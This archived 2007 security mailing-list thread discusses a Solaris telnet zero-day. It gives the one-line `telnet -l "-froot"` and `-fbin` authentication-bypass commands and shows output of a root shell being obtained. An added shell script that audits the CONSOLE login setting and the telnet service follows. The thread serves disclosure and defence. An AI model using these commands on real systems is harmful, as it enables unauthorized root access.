[Dshield] Solaris Telnet 0-day (Important!)

Scott Fendley scottf at uark.edu
Mon Feb 12 05:23:21 GMT 2007


HD is not 100% accurate.  It can be -froot if and only if you have
commented out the CONSOLE setting within /etc/default/login.  This
setting prevents network logins to the root account and is set by
default.  However, I have seen some admins comment it out as they had
been able to do logins to the root account in other Unix or Linux
distributions.  Below is an excerpt from a test on a system that has
that setting commented out.

% telnet -l "-froot" 192.168.1.1
Trying 192.168.1.1...
Connected to somehost (192.168.1.1.).
Escape character is '^]'.
Last login: Sun Feb 11 15:08:17 from myhost
Sun Microsystems Inc.   SunOS 5.10      Generic January 2005
# id
uid=0(root) gid=0(root)


With the console setting in its default state you get the below

% telnet -l "-froot" 192.168.1.1
Trying 192.168.1.1...
Connected to somehost (192.168.1.1.).
Escape character is '^]'.
Not on system console
Connection closed by foreign host.

Trying userids with non-standard shells, such as /bin/false or one
similar to the one in the JASS package, will also kick the end
user out.  Users that have been locked (passwd -l userid) will also
be booted out with a "Login incorrect" message.

Hope this helps everyone understand how much risk they have.

Scott


At 10:53 PM 2/11/2007, Gadi Evron wrote:
>From HD Moore:
>"but this bug isn't -froot, it's -fanythingbutroot =P"
>
>On Sun, 11 Feb 2007, K K wrote:
>
> > On 2/11/07, Johannes B. Ullrich <jullrich at sans.org> wrote:
> > > If you run Solaris, please check if you got telnet enabled NOW. If you
> > > can, block port 23 at your perimeter. There is a fairly trivial Solaris
> > > telnet 0-day.
> > >
> > > telnet -l "-froot" [hostname]
> > >
> > > will give you root on many Solaris systems with default installs
> > > We are still testing. Please use our contact form at
> > > https://isc.sans.org/contact.html
> >
> > On systems where the above fails with "Not on system console", don't
> > assume that the machine is secure, because the following does work,
> > and is one step from root:
> >
> > telnet -l "-fbin" [hostname]
> >
> > Gadi Evron <ge at linuxbox.org>  wrote:
> > > If Solaris 10 & 11 are truly vulnerable to this bug,
> > > Sun deserves a *swift* kick to the head.
> >
> > The above is from my testing with Solaris 10, so get ready to
> > start kicking...
> >
> > Kevin
> > _________________________________________
> >
> > SANS 2007 March 29 - April 6 in San Diego, CA offers 52 Courses
> > taught by our top rated instructors plus a huge vendor tools expo.
> > Register Today! http://www.sans.org/info/2501 (BROCHURECODE: ISC)
> >
>
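As an added example (not from Scott's post, the quoted thread, or any Sun tool), a small POSIX shell audit of the two conditions this message ties to exposure: whether the CONSOLE line in /etc/default/login is still active, and whether the telnet service is running. The LOGIN_DEFAULTS override, the function names and the SMF service lookup are assumptions; the sample files it is meant to be exercised against are constructed.

```shell
#!/bin/sh
# Added example, not from the original post: audit the two conditions the
# message ties to exposure, namely whether the CONSOLE restriction in
# /etc/default/login is still active and whether the telnet service is on.
# The LOGIN_DEFAULTS override is an assumption; sample files are constructed.

LOGIN_DEFAULTS="${LOGIN_DEFAULTS:-/etc/default/login}"

# console_restricted FILE
# Prints "restricted" (returns 0) when an uncommented CONSOLE= line exists:
# root may then log in only on the system console, and a network root login
# is refused with "Not on system console". Prints "unrestricted" (returns 1)
# when the line is absent or commented out; "unreadable" (returns 2) otherwise.
console_restricted() {
    file="$1"
    if [ ! -r "$file" ]; then
        echo "unreadable"
        return 2
    fi
    # A leading "#" turns the line into a comment (the change the message warns about).
    if grep -Eq '^[[:space:]]*CONSOLE=' "$file"; then
        echo "restricted"
        return 0
    fi
    echo "unrestricted"
    return 1
}

# telnet_enabled
# Prints "enabled", "disabled" or "unknown". Solaris 10 runs telnet as the
# SMF service svc:/network/telnet:default; older releases use inetd.conf.
telnet_enabled() {
    if command -v svcs >/dev/null 2>&1; then
        case $(svcs -H -o state svc:/network/telnet:default 2>/dev/null) in
            online*) echo "enabled" ;;
            *) echo "disabled" ;;
        esac
    elif [ -r /etc/inetd.conf ]; then
        grep -Eq '^[[:space:]]*telnet[[:space:]]' /etc/inetd.conf \
            && echo "enabled" || echo "disabled"
    else
        echo "unknown"
    fi
}

if [ "${1:-}" = "--audit" ]; then
    echo "CONSOLE restriction: $(console_restricted "$LOGIN_DEFAULTS")"
    echo "telnet service:      $(telnet_enabled)"
fi
```

Run it with --audit on the host being checked; the functions can also be sourced and pointed at a copied /etc/default/login.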
